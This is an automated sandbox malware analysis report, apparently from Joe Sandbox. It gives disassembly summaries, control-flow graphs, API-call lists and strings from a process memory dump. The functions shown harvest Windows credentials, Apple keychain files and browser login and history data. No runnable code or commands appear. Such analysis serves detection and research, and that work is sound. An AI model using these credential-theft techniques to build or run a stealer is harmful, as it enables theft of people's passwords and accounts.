                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                              • memset.MSVCRT ref: 00445755
                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                              • API String ID: 2745753283-3798722523
                                                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041276D Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 149COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                              • String ID: $/deleteregkey$/savelangfile
                                                                                              • API String ID: 2744995895-28296030
                                                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B6EF Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 388fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040B71C
                                                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                                                              • memset.MSVCRT ref: 0040B756
                                                                                              • memset.MSVCRT ref: 0040B7F5
                                                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                              • memset.MSVCRT ref: 0040B851
                                                                                              • memset.MSVCRT ref: 0040B8CA
                                                                                              • memcmp.MSVCRT ref: 0040B9BF
                                                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                              • memset.MSVCRT ref: 0040BB53
                                                                                              • memcpy.MSVCRT ref: 0040BB66
                                                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateDeleteFindLibraryLocalNotificationProcmemcmpmemcpywcscpy
                                                                                              • String ID: chp$v10
                                                                                              • API String ID: 170802307-2783969131
                                                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                              • String ID:
                                                                                              • API String ID: 3715365532-3916222277
                                                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                              • String ID: bhv
                                                                                              • API String ID: 327780389-2689659898
                                                                                              • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                              • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 633 413f4f-413f52 634 413fa5 633->634 635 413f54-413f5a call 40a804 633->635 637 413f5f-413fa4 GetProcAddress * 5 635->637 637->634
                                                                                              APIs
                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                              • API String ID: 2941347001-70141382
                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 638 4466f4-44670e call 446904 GetModuleHandleA 641 446710-44671b 638->641 642 44672f-446732 638->642 641->642 644 44671d-446726 641->644 643 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 642->643 653 4467ac-4467b7 __setusermatherr 643->653 654 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 643->654 646 446747-44674b 644->646 647 446728-44672d 644->647 646->642 649 44674d-44674f 646->649 647->642 648 446734-44673b 647->648 648->642 651 44673d-446745 648->651 652 446755-446758 649->652 651->652 652->643 653->654 657 446810-446819 654->657 658 44681e-446825 654->658 659 4468d8-4468dd call 44693d 657->659 660 446827-446832 658->660 661 44686c-446870 658->661 662 446834-446838 660->662 663 44683a-44683e 660->663 665 446845-44684b 661->665 666 446872-446877 661->666 662->660 662->663 663->665 667 446840-446842 663->667 669 446853-446864 GetStartupInfoW 665->669 670 44684d-446851 665->670 666->661 667->665 671 446866-44686a 669->671 672 446879-44687b 669->672 670->667 670->669 673 44687c-446894 GetModuleHandleA call 41276d 671->673 672->673 676 446896-446897 exit 673->676 677 44689d-4468d6 _cexit 673->677 676->677 677->659
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                              • String ID:
                                                                                              • API String ID: 2827331108-0
                                                                                              • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                              • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                              • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                              • String ID: visited:
                                                                                              • API String ID: 1157525455-1702587658
                                                                                              • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                              • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 ??3@YAXPAX@Z 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                                                              APIs
                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                              • API String ID: 3883404497-2982631422
                                                                                              • Opcode ID: 67bf6793a8a24478111131d0933ad52acf75e9ebe0c68e3797be97197fd61ec5
                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
